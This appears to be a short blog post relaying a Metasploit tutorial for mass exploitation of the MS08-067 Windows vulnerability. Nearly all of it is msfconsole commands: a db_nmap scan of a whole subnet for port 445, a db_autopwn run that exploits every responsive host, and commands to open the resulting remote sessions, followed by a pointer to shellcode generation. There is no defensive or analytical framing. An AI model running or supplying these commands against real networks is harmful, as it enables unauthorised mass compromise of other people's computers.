Metasploit are giving out a very simple step-by-step sample for exploiting the latest MS08-067 vulnerability from the msfconsole.
The below steps will scan hosts on subnet AAA.BBB.CCC.0/24 for open port 445, and launch the exploit against the active hosts.
msf > load db_sqlite3
msf > db_create
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
msf > db_autopwn -e -p -b -m ms08_067
Then view the opened sessions by:
msf > sessions -l
msf > sessions -i 1
http://blog.metasploit.com/2009/02/metasploit-mass-exploitation-for.html
For writing shellcode, check Generating Shellcode Using Metasploit
No comments:
Post a Comment